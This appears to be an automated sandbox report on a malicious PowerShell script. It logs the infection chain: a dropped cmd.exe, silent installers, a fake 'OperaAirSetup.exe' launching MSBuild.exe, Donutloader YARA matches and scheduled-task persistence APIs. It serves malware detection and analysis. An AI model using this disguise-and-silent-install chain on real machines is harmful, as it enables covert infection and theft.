Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: String function: 00EB9C97 appears 90 times

Source: cmd.tmp.7.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: cmd.tmp.7.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: cmd.tmp.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: cmd.tmp.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

Source: 12.2.OperaAirSetup.exe.29b243e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 12.2.OperaAirSetup.exe.29b243e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000C.00000002.2855864758.00000000029B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winPS1@15/31@3/4

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe

Code function: 12_2_029B0AD1 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

12_2_029B0AD1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 13_2_004411E0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

13_2_004411E0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ueodfvoh.azw.ps1

Jump to behavior

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Command line argument: Title	12_2_00E9EF66
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Command line argument: BeginPrompt	12_2_00E9EF66
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Command line argument: Progress	12_2_00E9EF66
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Command line argument: yes	12_2_00E9EF66
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Command line argument: RunProgram	12_2_00E9EF66
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Command line argument: ExecuteFile	12_2_00E9EF66
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Command line argument: InstallPath	12_2_00E9EF66
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Command line argument: %%T	12_2_00E9EF66

Source: C:\Windows\Temp\cmd.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: wEY98gM1Jj.ps1

Virustotal: Detection: 14%

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wEY98gM1Jj.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\wEY98gM1Jj.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe"
Source: C:\Windows\Temp\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp "C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp" /SL5="$8007C,13626613,119296,C:\Windows\Temp\cmd.exe"
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Process created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe" /VERYSILENT
Source: C:\Windows\Temp\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp "C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp" /SL5="$6042A,13626613,119296,C:\Windows\Temp\cmd.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Process created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe "C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe"
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe"	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp "C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp" /SL5="$8007C,13626613,119296,C:\Windows\Temp\cmd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Process created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe" /VERYSILENT	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp "C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp" /SL5="$6042A,13626613,119296,C:\Windows\Temp\cmd.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Process created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe "C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: efswrt.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
